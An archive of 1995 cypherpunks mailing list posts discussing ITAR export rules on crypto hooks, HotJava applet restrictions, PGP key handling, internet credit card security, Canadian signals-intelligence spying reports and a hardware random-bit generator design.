> the ITARs do they point to when they say "this is illegal"?  I've perused
> an online copy of ITAR (no, I haven't read all of it -- I have other
> things I want to do this year :-), but I can't find a section that could
> be construed to support this contention.

  I scanned through the ITAR, and I agree that there doesn't seem to be 
anything about hooks that are illegal, but the NSA does have the 
authority to protect whatever threatens national security.  If they are 
over-stepping their bounds who is going to push it to court to find out, 
as that is where the decision would have to be made (very expensive).
  Take care and have fun.

James Black






From fc at all.net  Wed Nov 15 04:18:56 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Wed, 15 Nov 95 04:18:56 PST
Subject: Netscape rewards are an insult
In-Reply-To: <199511151019.CAA18910@jobe.shell.portal.com>
Message-ID: <9511151215.AA20714@all.net>


> Alice here ...
...
> My post detailing a structural flaw in Netscape Navigator was announced,
> very quietly, to this list OVER ONE MONTH AGO.  And what has been done
> about it, by AT&T and/or Netscape??  Nothing. 
> 
> AT&T has its reputation attached to this code, as does Deutsche Telecom,
> as does Netscape.  The only "action" they've taken is to info-freeload and
> then do absolutely, positively, definitely ... nothing. 
> 
> Diddly-squat.
> 
> No one has taken any action whatsoever.

On a closely related vein, Sun has announced that they are severely
limiting some functions in HotJava - from Risks-17-45:

: The paper written by the two students at Princeton describes possible
: attacks on the alpha3 HotJava browser, which have all been fixed in JDK
: beta.  Granted, until this week, the source code for JDK beta wasn't
: available, so it's understandable that they analyzed the alpha3 source base.
: 
: We understand people need more information on the security model, and we're
: taking time right now to document the security story more rigorously.  A
: security FAQ, an updated whitepaper, detailed user documentation and
: detailed implementor's documentation are all being worked on.
: 
: ...
: 
: Access Control Lists are greatly restricted in beta,
:         as compared to the situation in the alpha3 HotJava browser. 
:         ACLs are initialized - only once - by the applet security
:         manager, and are not user configurable.
: 
:         For a file not on the access control list, an applet cannot
: 
:         - check for the existence of the file
:         - read the file 
:         - write the file 
:         - check the file type
:         - check if the file is a directory
:         - check the timestamp when the file was last modified
:         - check the file's size
:         - create a directory 
:         - rename the file
:         - list the files in this file (as if it were a directory)
: 
:         Applets cannot
: 
:         - create a FileInputStream 
:         - create a RandomAccessFile, either for reading or writing
:         - Open file descriptors
: 
:   2.  Sockets: 
: 
:         Applets cannot 
: 
:         - Create socket connections other than to its own host
:         - Create a socket factory
: 
:   3.  Loading/linking: 
: 
:         Applets cannot 
: 
:         - Create class loaders
:         - Access a package in the sun.* hierarchy
:         - Define a new class in the java.* hierarchy
:         - Link dynamic libraries using System.loadLibrary()
:         - Disable or override the AppletSecurityManager
: 
:   4.  Process control: 
: 
:         Applets cannot 
: 
:         - Define native methods
:         - Fork processes
:         - Manipulate threads or thread groups outside of the
:           applet's thread group
:         - Exit the virtual machine (e.g., the browser or the appletviewer)
: 
:   5.  awt: 
: 
:         Applets cannot
: 
:         - Create toplevel windows that don't have a warning banner
: 
: ...

I had a rather lengthy discussion with a gentleman from Sun at the CSI
conference last Tuesday night, and this announcement follows many of the
things we discussed very closely.  This kind of consistency between what
people say and what the company published is refreshing, and it restores
my faith in Sun's desire to do things well.  Of course there are still
some problems left unresolved:

:...
: It's very difficult, if not impossible, for a web browser to completely
: prevent denial of service attacks.  The JDK applet API doesn't claim to
: prevent denial of service attacks.  A "denial of service" attack is where
: someone writes an applet whose goal is to consume all available resources on
: your computer, forcing you to kill the browser you're running.  For example,
: someone could write an applet that creates a million pop-up windows.  The
: windows don't do anything, but creating a million of them might use up all
: the virtual memory on your computer and you'd have to kill the web browser
: to reclaim the virtual memory.
: 
: Before people engage in too much wailing and gnashing of teeth about
: how applets have been too severely restricted - 
: 
: We want to enable applets to do interesting things, including making
: socket connections, and reading and writing to the file system.  One
: way to enable that is to used a signed class loader.  When a trusted
: applet is loaded, then the applet could be granted permission to do
: some of the things they are prevented from doing by default.
: 
: The goal is to ensure that untrusted applets can't steal or damage
: information on a computer running a Java-enabled browser.  Later, we can
: allow trusted applets to do things that untrusted applets are not allowed to
: do.  Since an implementation bug in a trusted applet could open a loophole
: that could be exploited by an untrusted applet, design matters.
:...

Similarly, if your HotJava allows an insecure Postscript implementation
to interpret postscript files, you're still beat.

I do think that this response by Sun, regardless of the technical merits
of the particulars, demonstrates a desire to improve protection and a
willingness to listen.  My compliments for that.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From ses at tipper.oit.unc.edu  Tue Nov 14 12:26:30 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Wed, 15 Nov 1995 04:26:30 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <9511141920.AA13573@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.951114115921.17855A-100000@chivalry>


On Tue, 14 Nov 1995, Rich Salz wrote:

> As I said in my original message about Pegasus:
> 	The NSA consider this kind of thing "crypto with a hole"
> 	It's stupid, the hole is the crypto.  But, the rest of
> 	the code is considered by the Agency to be an "ancilliary
> 	device" as defined under ITAR.

The interesting question is how narrow the interface has to be before it 
becomes in violation of the ITAR. Is the key question whether the "holes" 
are specifically designed for the insertion of cryptographic materials, 
or is it the fact that they could be used to support cryptographic 
enhancements?






From klp at gold.tc.umn.edu  Tue Nov 14 12:33:38 1995
From: klp at gold.tc.umn.edu (Kevin L Prigge)
Date: Wed, 15 Nov 1995 04:33:38 +0800
Subject: Good Enough?
Message-ID: <30a8f8836ed1002@noc.cis.umn.edu>


We're looking at providing good tools for digital signatures on
e-mail here, for users that are interested. We plan to make available
PGP public keys in the student/staff X.500 directory, with suitable
tools for retrieving keys, etc. A couple questions have come up that
make me wonder what would be an acceptable service, at least given
the environment that we have to work with.

The first question has to do with key generation. One of the managers
was of the opinion that we could do the key generation for the user,
and either email or otherwise make the private key available to the 
user. The idea is to make it easy for the user to create their keys
by providing a web interface, etc. BTW, we're running Netscapes 
Commerce server so we could expect at least 40 bits of protection
(big deal, I know) on the passphrase transmission. The good enough
part is due to the idea that we're running a couple of large multi-
user machines, with all the risks those entail. Note also that 
we would not be keeping logs or otherwise compromising the keys
ourselves, this would strictly be a user-friendly way to get people
using signatures. We would also accept keys that users create themselves,
this would only be one option.

Second, the web of trust might also be useful, so we could sign
users keys to certify them. Has anyone worked in an organization
of some sort that has a structured approach to key certification
using PGP?

This is just in the preliminary talking stages at this point,
but I thought I'd toss these 2 ideas out for comments to see
what people here think.

 
-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp at cis.umn.edu | possible exceptions of handguns and tequila."
01001101100010110010111|- Mitch Ratcliffe





From sjb at universe.digex.net  Tue Nov 14 12:55:41 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Wed, 15 Nov 1995 04:55:41 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511141758.MAA14695@jafar.sware.com>
Message-ID: <199511142038.PAA07035@universe.digex.net>


Jeff Barber writes:
>Does anyone know the ostensible justification for this?  What section of
>the ITARs do they point to when they say "this is illegal"?  I've perused
>an online copy of ITAR (no, I haven't read all of it -- I have other
>things I want to do this year :-), but I can't find a section that could
>be construed to support this contention.

I think it's 121.1, Category XIII paragraph (b) item (5):
"Ancillary equipment specifically designed or modified for paragraphs (b)
(1), (2), (3), (4) and (5) of this category;"





From perry at piermont.com  Tue Nov 14 13:19:35 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 15 Nov 1995 05:19:35 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.SUN.3.91.951114144604.9607A-100000@sunflash.eng.usf.edu>
Message-ID: <199511142050.PAA05867@jekyll.piermont.com>



James Black writes:
>   I scanned through the ITAR, and I agree that there doesn't seem to be 
> anything about hooks that are illegal, but the NSA does have the 
> authority to protect whatever threatens national security.

Since when? They aren't a police agency. They have no power to arrest
or prosecute, and they don't even (directly) make any decisions on any
of this stuff (although they are responsible for the decisions that
made).

.pm





From msew+ at andrew.cmu.edu  Tue Nov 14 13:23:02 1995
From: msew+ at andrew.cmu.edu (Martin C Sweitzer)
Date: Wed, 15 Nov 1995 05:23:02 +0800
Subject: world smartcards..
In-Reply-To: <9510200413.AA17440@sulphur.osf.org>
Message-ID: <AkeE5Ve00WBMQ8F_Qw@andrew.cmu.edu>


Anyone know what kind of encryption they will be using...


------------------------------------------------------------------
HP builds security for smartcard shopping
=========================================
Hewlett-Packard is bidding for US government approval for a
worldwide cryptographic framework, which is being to provide a
security for a joint smartcard project with Gemplus and
Informix.

The three companies plan to develop a secure personal
information card system, with which businesses can deliver
services including Internet-based transactions to consumers.
The encrypted cards will carry several thousand times the
amount of data on current smartcards and will (pending US
export approvals) be usable anywhere in the world.

HP is providing server, encryption, middleware and networking
technologies. Gemplus will provide advanced smart-card tech-
nology. Database and middleware technologies will come from
Informix. The alliance was launched at Telecom 95.

HP's proposed non-user-accessible cryptography is the first
element in an international open cryptography framework, with
which it hopes to deliver security technology compliant with
US export regulations.





From anonymous-remailer at shell.portal.com  Tue Nov 14 13:24:49 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 15 Nov 1995 05:24:49 +0800
Subject: [NOISE] Credit Card security in the New York Times
Message-ID: <199511142050.MAA20488@jobe.shell.portal.com>


On Mon, 13 Nov 1995, Nelson Minar wrote:

> Today's New York Times has a nice article in the business section
> about credit card security on the Internet. It's more of an editorial
> than an article, but it's an editorial with the (IMNSHO) right spin:
> shipping a credit card number over the Internet, even unencrypted, is
> no less secure than giving it out over the phone.

I haven't picked up the paper and looked at the article.  Once in a blue
moon, I might pick up the International Herald Tribune, but only on the
rarest of rare circumstances, but this worries me.  

And it really should worry everyone who might have some interest in harm
reduction. 

If someone in the Business Section of the New York Times is writing as you
say -- writing that shipping a credit card number UNENCRYPTED over the
Internet is no less secure than giving it out over the phone, then we have
a SERIOUS communications/understanding gap to overcome. 

It seems like not only the NY Times, but the "You Will" folk at AT&T don't
quite "get" it.  (The AT&T swipe, is for the idjit that sent me email on
postcard via bucket brigade, and then asked me to please keep it
"private".)

A simple understanding is necessary if we're going to use this 
snazzy new technology, and not kill the goose that lays the golden 
egg.  An understanding that the NY Times, or its *experts* don't seem to 
have.

A telephone connection goes from one point to another.  It's like a 
football pass.  An internet connection is different, it's like an old 
fashioned bucket brigade.

Now, if you were to write a message on a football, and throw it, while
their is a "risk" of inteception you can be reasonably certain that the
message on the ball will be "reasonably" safe while flying through the 
air.  This is the phone call "football" analogy..

The net however does not establish a direct connection like a telephone
call.  It works like the old "bucket brigade" of volunteer fire
departments.  Your message is handed off -- handed to the next person in a
chain, who then hands it to the next, and so on. 

Your "message" (or credit card number) is effectively written on a
postcard and passed around from person to person, before it gets to your
final destination.  This makes it completely different than the telephone
call.  Orders of magnitude different.

So here's the question ... and here's the comparison.  Would you, if you
were in New York, buy something with your credit card using the following
payment method. 

Would you, write your credit card number on the back of a postcard, and
leave it with your neighbour, with instructions to give to the doorman,
who's supposed to flag a cabbie and tell him to take it to a building, to
then give it to another doorman, who will leave it with the business next
door to give to the person or business that you want to have your credit
card number?? 

Why not??  Does this strike any reader as something really silly??  

Because, this is actually the way the Internet works.  This is exactly how
any message, whether its your email, or your credit card number gets from
Point A to Point B.  A message that is going from one computer, even to
one just down the block, might end up going through twenty or third
"hands" before being delivered. 

This is what makes the Internet rather unsafe, far more unsafe than a
telephone call.  And this lack of understanding, the lack of understanding
in the press is what makes the Internet even unsafer.  It is people being 
very cavalier.

Many people trust the NY Times to "get it right", then again, the  investor
also trusts that these companies actually know what they're doing. 

The public deserves better.

> The NYT has been doing a nice job covering computer issues in the past
> few months, in the Monday's business section. Worth reading if you
> want to keep an eye on intelligent media coverage of the net.

If this is the "intelligent media coverage", then how on earth are they
going to be able to cover "taking down" the Internet for some repairs?? 

And how are they gonna cover the inevitable, Internet crime of the
century? 



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.









From sjb at universe.digex.net  Tue Nov 14 13:29:36 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Wed, 15 Nov 1995 05:29:36 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.SOL.3.91.951114115921.17855A-100000@chivalry>
Message-ID: <199511142054.PAA07674@universe.digex.net>


Simon Spero writes:
>The interesting question is how narrow the interface has to be before it 
>becomes in violation of the ITAR. Is the key question whether the "holes" 
>are specifically designed for the insertion of cryptographic materials, 
>or is it the fact that they could be used to support cryptographic 
>enhancements?

If the ban *is* due to Category XIII (b) (5), the wording would
indicate that the "hole" must be "specifically designed or modified" to
support crypto.  One that was specifically designed to support some
sort of block compression library should be exempt under that
paragraph, even if someone else were to write and distribute a crypto
library with an identical interface.

'Course, IANAL, and the interpreters of the ITAR don't really seem to
care what it *says*, anyway.





From djw at pdcorp.com  Tue Nov 14 13:38:17 1995
From: djw at pdcorp.com (Dan Weinstein)
Date: Wed, 15 Nov 1995 05:38:17 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.SUN.3.91.951114144604.9607A-100000@sunflash.eng.usf.edu>
Message-ID: <199511142110.NAA28546@email.pdcorp.com>


On Tue, 14 Nov 1995 14:49:23 -0500 (EST), you wrote:

>Hello,
>
>On Tue, 14 Nov 1995, Jeff Barber wrote:
>
>> s1113645 at tesla.cc.uottawa.ca writes:
>> 
>> Does anyone know the ostensible justification for this?  What section of
>> the ITARs do they point to when they say "this is illegal"?  I've perused
>> an online copy of ITAR (no, I haven't read all of it -- I have other
>> things I want to do this year :-), but I can't find a section that could
>> be construed to support this contention.
>
>  I scanned through the ITAR, and I agree that there doesn't seem to be 
>anything about hooks that are illegal, but the NSA does have the 
>authority to protect whatever threatens national security.  If they are 
>over-stepping their bounds who is going to push it to court to find out, 
>as that is where the decision would have to be made (very expensive).
>  Take care and have fun.

The ITAR talks about crypto components, the government is interpreting
this as software that allows plug-in encryption.



Dan Weinstein
djw at pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche








From cabeen at netcom.com  Tue Nov 14 13:41:38 1995
From: cabeen at netcom.com (Ted Cabeen)
Date: Wed, 15 Nov 1995 05:41:38 +0800
Subject: Repeated Words/characters in Password/Phrase
Message-ID: <199511142111.NAA08624@netcom17.netcom.com>


Do repeated words in a PGP passphrase make the pass phrase less secure than
a passphrase without any repeated words?  And on the same note, do repeated
letters in a UNIX password make that password easier to break? I can't seem
to find anything in my books on cryptography that mention this.  Thanks.
_____________________________________________________________________________
Ted Cabeen                                                  cabeen at netcom.com
Finger for PGP Public Key                        secabeen at midway.uchicago.edu
"I have taken all knowledge to be my province."            cococabeen at aol.com






From warlord at MIT.EDU  Tue Nov 14 13:46:08 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Wed, 15 Nov 1995 05:46:08 +0800
Subject: Good Enough?
In-Reply-To: <30a8f8836ed1002@noc.cis.umn.edu>
Message-ID: <199511142124.QAA23598@toxicwaste.media.mit.edu>


Hi.

First, I must warn you that generating keys on behalf of users is in
general a very bad thing to do.  Instead, you might want to provide a
simple way for users to generate keys and get them certified.  The
biggest problem is that there is not an easy way to get a good set of
random numbers on a server platform.  On the other hand, users can get
a great deal of randomness on their own client machines.  If they can
run netscape, then they can run PGP.

Second, you might want to look at a paper that Jeff Schiller and I
wrote for the 1995 Usenix conference on scaling the web of trust.
The paper is available off my home page or via ftp:
	toxicwaste.mit.edu:/pub/pgpsign/scaleweb.{txt,PS}

The sources to the keysigner are also in the same directory.

Hope this helps.

-derek

       Derek Atkins, SB '93 MIT EE, SM '95 MIT Media Laboratory
       Member, MIT Student Information Processing Board (SIPB)
    Home page: http://www.mit.edu:8001/people/warlord/home_page.html
       warlord at MIT.EDU    PP-ASEL     N1NWH    PGP key available





From harmon at tenet.edu  Tue Nov 14 14:02:44 1995
From: harmon at tenet.edu (Dan Harmon)
Date: Wed, 15 Nov 1995 06:02:44 +0800
Subject: data compression
Message-ID: <Pine.OSF.3.91.951114000133.18347B-100000@gaston.tenet.edu>



Does any one have any information about or pointers to the data compression 
alogrithms used by Colorado Systems and/or any other QIC backup vendors?

Thanks,

Dan



 





From llurch at networking.stanford.edu  Tue Nov 14 14:09:44 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Wed, 15 Nov 1995 06:09:44 +0800
Subject: ANNOUNCE: Curve Encrypt 2.2
In-Reply-To: <199511140336.UAA17922@bogart.Colorado.EDU>
Message-ID: <Pine.ULT.3.91.951113204535.2116G-100000@Networking.Stanford.EDU>


Sounds cool, but...

I already have PGP on my Macs. Why would I want this?

I suppose one use might be in a public lab, where a secret key and
identity would be inappropriate. Or maybe to encrypt your PGP keychains if
you leave them on a physically insecure hard drive (though you could use
PGP conventional encryption for that). 

-rich





From s1113645 at tesla.cc.uottawa.ca  Tue Nov 14 14:13:13 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Wed, 15 Nov 1995 06:13:13 +0800
Subject: CSE gets flak on TV
Message-ID: <Pine.3.89.9511141646.A37652-0100000@tesla.cc.uottawa.ca>


For those who care, the Communications Security Establishment has been
getting some flak for spying on Mex. during NAFTA talks and on Korea to
help us sell Can. nuke reactors:
(This rather mirrors the trouble their sister agency, the NSA, has been 
getting into)
(sorry the online newscasts were rather vague)
     _________________________________________________________________ 
   
                        CP LOGO CANADIAN NEWS DIGEST 
                                       
   
   Tuesday, Nov. 14
   
   
   
   
   Electronic snooping part of the game
   
   
   OTTAWA (CP)--Intelligence experts say it's no big secret that Canada's
   high-tech spy agency snoops on friendly countries for financial gain. 
   
   Increasingly, intelligence agencies around the world are using their
   antennas, computers and codebreakers to gather economic information,
   Wesley Wark, a University of Toronto history professor, said Monday.
   
   Some of Canada's largest trading partners--including the United
   States, France and Japan--comb the airwaves for useful information, so
   Canada would be foolish not to join the game, said Wark. 
   
   Canada's secretive Communications Security Establishment--an arm of
   the Defence Department--collects and analyses communications traffic
   on the activities of foreign states, corporations and people.
   
   Jane Shorten, a former CSE employee, told CTV News in an interview
   Sunday the agency spied on Canada's allies and trading
   partners--including Mexico and South Korea--by eavesdropping on
   embassies, consulates and diplomats.
   
   ___


                                 HEADLINE NEWS
                                       
All times are Eastern Standard Time

Date: Tue-14-Nov-1995, Time: 13:00

   
   mexico and south korea are angry about reports that canada spied on
   them. the mexican government has filed a diplomatic note expressing
   its suprise and concern, and south korea has launched an inquiry. a
   former intelligence agent, jane shorten, says she spied on both
   countries, as well as japan, when she was with the communications
   security establishment. she says the c-s-e shifted its focus after the
   cold war from spying on the russians to spying on allies to get trade
   secrets. prime minister chretien says the organization is supposed to
   operate within the law. chretien says the c-s-e doesn't report to him
   on a daily basis, so he doesn't know if it was spying on anyone. 
   





From sameer at c2.org  Tue Nov 14 14:34:49 1995
From: sameer at c2.org (sameer)
Date: Wed, 15 Nov 1995 06:34:49 +0800
Subject: setting up an ecash shop
Message-ID: <199511142206.OAA22935@infinity.c2.org>


	If you'd like to setup an ecash shop as a merchant, you can
do it this week and have the $300 setup fee waived. (This
is for the $5/month 2% movement fee account-- the most expensive one
they have.) I setup my eshop at c2.org thing using the promotion.
	Information is at http://www.marktwain.com/promo.html

	(The $300 setup fee I think is outrageous, but at least this
week you don't have to worry about it.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From frantz at netcom.com  Tue Nov 14 14:40:58 1995
From: frantz at netcom.com (Bill Frantz)
Date: Wed, 15 Nov 1995 06:40:58 +0800
Subject: [NOISE] Credit Card security in the New York Times
Message-ID: <199511142212.OAA14291@netcom17.netcom.com>


At 12:50 11/14/95 -0800, anonymous-remailer at shell.portal.com wrote:
>On Mon, 13 Nov 1995, Nelson Minar wrote:
>
>> Today's New York Times has a nice article in the business section
>> about credit card security on the Internet. It's more of an editorial
>> than an article, but it's an editorial with the (IMNSHO) right spin:
>> shipping a credit card number over the Internet, even unencrypted, is
>> no less secure than giving it out over the phone.
>
>I haven't picked up the paper and looked at the article...
>
>If someone in the Business Section of the New York Times is writing as you
>say -- writing that shipping a credit card number UNENCRYPTED over the
>Internet is no less secure than giving it out over the phone, then we have
>a SERIOUS communications/understanding gap to overcome. 

I did read the article.  It said, "The truth is that sending a credit card
number to an electronic merchant over the Internet is probably the safest
way to make such a transaction.

"In the last week, for example, I handed my credit card to a waiter who
disappeared with it for five minutes.  I faxed my credit card information
to a business in New Jersey, and the fax probably lay exposed to everone in
that office for hours and perhaps to the cleaning crew than night. ...

"Yes, there is a risk that someone was tapping my telephone when I read my
credit card number aloud or faxed it.  [reminder about cell phones deleted]
 A spy might have snapped a picture of my credit card with a hidden camera
when I handed it to the waiter.  A hacker might have intercepted my numbers
as they passed through an Internet router in Hackensack, N.J.

" But compared with the risk of handing my credit card to a stranger, which
I do nearly every day, sending it over the Internet is pretty secure.

"The real reisk of sending my unencrypted number is not that some
cyberspace cowboy will intercept it en route to the electronic merchant,
but rather that the receiving company will store my credit information in
an insecure computer. ...

"My credit card number was probably among the 30,000 or so that were lifted
last year from unsecured computers of Netcom ...

"Willy Sutton did not myug individuals for their wallets; he robbed banks,
because, as he noted, that's where the money was...

"... The people who should be really nervous about electronic commerce are
the banks, brokerage houses and those who do business-to-business
transactions."


In context, a much more reasonable view than the anonymous poster suggests.
 I add, that with an insurance policy (that you are forced to pay for)
which broadly limits your risk to $50, you don't have to be all that
carefull.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz at netcom.com             Los Gatos, CA 95032, USA







From rsalz at osf.org  Tue Nov 14 14:49:32 1995
From: rsalz at osf.org (Rich Salz)
Date: Wed, 15 Nov 1995 06:49:32 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <9511142220.AA13813@sulphur.osf.org>


>are specifically designed for the insertion of cryptographic materials, 
>or is it the fact that they could be used to support cryptographic 
>enhancements?

Everything is decided on a case-by-case basis.  I was in a meeting
with some NSA export-control people (Dept Z03) and asked a few questions
on this topic trying to nail down the angle of this slipper slope.

Basically, generic buffer-manipulation is okay.  "Keyed compression"
where you explicitly passed something called a key to a DLL routine
would be looked on suspiciously.  An abstract set of open/modify/close
routines (where open returned a pointer to opaque state, say a session
key :) would be fine.  The technical guy quickly grasped that I was
talking about anonymous remailers, but they "conceded" there's nothing
they can do about it.

I say "concede" because that implies more political/control-issues
then were really present at the meeting.
	/r$





From jya at pipeline.com  Tue Nov 14 14:51:26 1995
From: jya at pipeline.com (John Young)
Date: Wed, 15 Nov 1995 06:51:26 +0800
Subject: CSE gets flak on TV
Message-ID: <199511142220.RAA05223@pipe9.nyc.pipeline.com>



Responding to msg by s1113645 at tesla.cc.uottawa.ca () on Tue, 14 
Nov  4:47 PM

>For those who care, the Communications Security 
>Establishment has been  getting some flak for spying on 
>Mex. during NAFTA talks and on Korea to  help us sell 
>Can. nuke reactors:


Here's a facet of the burgeoning counterspying, oops, biz-intel 
blathering, oops, globally competing, oops, leveling the 
playing field, oops, securing the econo-nation, oops, 
downsizing spies and X-spies and XX-ing spies and putting to 
pasture cud-chomping nincompoops of the Chomsky-contra-CIA 
golden-asses era:

---------

   The Wall Street Journal, November 14, 1995, p. A15.


   This Is the CEO -- Get Me the CIA [Op-Ed, excerpts]

   By Ernest Brod. (Mr. Brod is executive managing director of
   Kroll Associates, an international investigation, business
   intelligence and security frim based in New York.)


   While government policy makers ponder and debate [economic
   espionage] issues, U.S. companies are fighting the global
   competitiveness battle. In the past year U.S. companies
   have rushed to level the playing field with foreign
   competitors who have long exploited the advantage of
   competitor intelligence. For years, foreign-based
   multinationals have had teams of people devoted to learning
   as much as they could about their U.S. competitors. The
   methods ranged from in-depth research and analysis of
   publicly available information to covert and sometimes
   clumsy attempts at industrial espionage, in some cases with
   the active support of their government's intelligence
   agencies.

   Today, having had their consciousness raised by the global
   business realities of the '90s, U.S. companies in all
   industries are scrambling to set up units devoted to
   gathering strategic information about the competition.
   Teams can be found at both corporate and division levels;
   they may be multi-department or reside within planning,
   development, marketing, finance or international units.
   They may have euphemistic labels and they increasingly draw
   upon burgeoning numbers of outside private resources.

   In recent months, for example, my firm was asked to help
   determine:

   + Whether an Asian competitor will take advantage of the
   North American Free Trade Agreement to establish facilities
   in Mexico in order to supply the U.S. market.

   + How an overseas competitor with an apparently comparable
   cost base can consistently produce lower bids.

   + Who controls an overseas private company and how deep are
   their pockets.

   While the controversy continues over whether U.S. companies
   should be favored with government-sponsored industrial
   intelligence, managers are already employing legal and
   ethical research and investigative techniques to learn more
   about the methods, resources and plans of their marketplace
   adversaries.

   These forays may not be exciting, risky or glamorous enough
   for our battle-hardened spy masters, but they help American
   strategists win hard-fought ground from their adversaries.














From pmonta at qualcomm.com  Tue Nov 14 14:53:07 1995
From: pmonta at qualcomm.com (Peter Monta)
Date: Wed, 15 Nov 1995 06:53:07 +0800
Subject: Hardware-random-bits interface
Message-ID: <199511142231.OAA25441@mage.qualcomm.com>


I've been thinking about physically random bits recently, so
I'd like to offer a simple, easily implementable interface to a
source of such bits, along with a design sketch using a common
radio receiver chip as the noise source.  The interface consists
of two bits in the standard PC parallel port, one serving as
the data line and the other the sampling clock.

The parallel port, while a bit less universal than RS-232, eliminates
the complexity of UARTs and clock generation and offers higher speed
and friendlier local power.  For an ISA bus running at 8 MHz, bits can
be sampled at about 2.5 Mb/s, i.e., about 300 kB/s.  (The bandwidth of
the noise source should of course be consistent with this.)  Another
advantage of a simple device is that it can be thoroughly inspected:
there is no PLD or microcontroller code to vet/trust.

Not all parallel ports have bidirectional data registers, so the
most general path is to assign a status bit to the input and
use a control bit for the clock output.  I'm using bit 4 of
the status register (pin 13 on the PC's DB-25) as the input
and bit 0 of the control register (pin 1) as the clock.
Specifically, the rising edge of pin 1 should sample the noise
waveform and present the result on pin 13.  (Pin 1 is inverted,
so bit 0 should transition from 1 to 0.)

I'd also like to suggest a device name for the Unix environment,
/dev/prandom, for "physically random".  The intention is that the
bits returned be as raw as possible, as close to the physics as
possible, leaving any debiasing/hashing to other software (for
example, the /dev/random implementation in recent Linux kernels).
(I have a Linux device driver that implements this interface;
it is very simple, needing only to sample the bits, pack them
into bytes, and manage mutual exclusion, filesystem housekeeping,
and probing.)

Here are the particulars of the "dongle" board I'm in the
process of making.

  Noise source:  an FM/IF radio receiver chip, with no input
    supplied, so that the IF amplifier chain produces wideband
    noise at its output.  I'm looking at the Motorola MC13158
    and the Philips SA626.  Each provides about 20 MHz of
    IF bandwidth, and the Motorola part has an on-chip
    comparator, reducing the entire device to two chips:
    the receiver chip and an HCMOS flip-flop.

  Power:  from the port data lines; >=3.5V at about 20 mA is
    available.

  Device probing:  the device should somehow identify itself
    as a random bit generator.  One way to do this is to wire
    one of the parallel port data bits to a status line; for
    example, data bit 0 (pin 2) could be wired to status bit 5
    (pin 12).  Software can then twiddle the data bit and
    watch for the response.

  Cost:  around $10 in parts, I guess.

A rate of 300 kB/s will make a 600 MB one-time pad in an hour
(assuming software is similarly fast).  I'm wondering if any
of the mail systems have convenient hooks to use pads (though
it would not be difficult to write up).

Suggestions welcome.  I'll put the design on the Web
once it's finished; replicating it should be pretty easy.
People can also grab the device driver if they wish.

Cheers,
Peter Monta   pmonta at qualcomm.com
Qualcomm, Inc./Globalstar






From jya at pipeline.com  Tue Nov 14 15:36:19 1995
From: jya at pipeline.com (John Young)
Date: Wed, 15 Nov 1995 07:36:19 +0800
Subject: world smartcards..
Message-ID: <199511142317.SAA11549@pipe9.nyc.pipeline.com>



Responding to msg by msew+ at andrew.cmu.edu (Martin C Sweitzer) 
on Tue, 14 Nov  3:51 PM

>Anyone know what kind of encryption they will be 
>using...


HP's web site at <http://www.hp.com> has more info on the cards 
and the related "international cryptographic platform" being 
crippled and begged and groveled to USG for export.


Try the site's search feature for "encryption" to poke around 
HP's various products, where some of the crypto to be employed 
is cited, if hypocryptically.








From raph at CS.Berkeley.EDU  Tue Nov 14 15:42:10 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Wed, 15 Nov 1995 07:42:10 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511142110.NAA28546@email.pdcorp.com>
Message-ID: <199511142322.PAA24924@kiwi.cs.berkeley.edu>


I move we file a CJR on some suitable software with crypto hooks. Off
the top of my head, the most plausible candidate is NCSA httpd v1.3.
It's certainly software with function other than crypto. It's also the
case that the crypto hooks are nearly unusable. I should know - I got
quoted in USA Today for buying three CDs using these hooks ;-).

Another possibility that comes to mind is Eudora. A judgement that
Eudora is non-exportable is certain to piss a lot of people off. I'm
not sure whether that's a good thing or a bad thing. I promise not to
file a CJR without the express permission of the owners of the
software.

Such a CJR would certainly not be frivolous. It is certainly the case
that the law is not clear enough for software producers to move with
confidence. Further, applications with crypto hooks are much more
important to the cpunk cause than are the crypto applications
themselves. Face it: PGP is available to all, but very few people
actively use it. Its serious usability problems are only a small part
of the reason. The real reason is that people are unwilling to
integrate with it because they're afraid of the export controls.

By the way, I have not heard back regarding my t-shirt CJR. If I have
time, I'll call them tomorrow and ask what's up.

Raph





From mark at unicorn.com  Tue Nov 14 16:08:44 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Wed, 15 Nov 1995 08:08:44 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <Pine.3.89.9511142357.A2503-0100000@unicorn.com>


On Tue, 14 Nov 1995, Raph Levien wrote:

